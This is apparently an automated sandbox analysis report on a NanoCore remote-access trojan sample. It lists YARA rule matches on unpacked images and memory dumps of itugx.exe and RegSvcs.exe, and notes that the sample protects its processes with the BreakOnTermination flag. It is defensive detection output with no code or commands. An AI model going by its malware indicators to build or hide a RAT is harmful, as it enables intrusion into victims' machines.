Source: Yara match	File source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
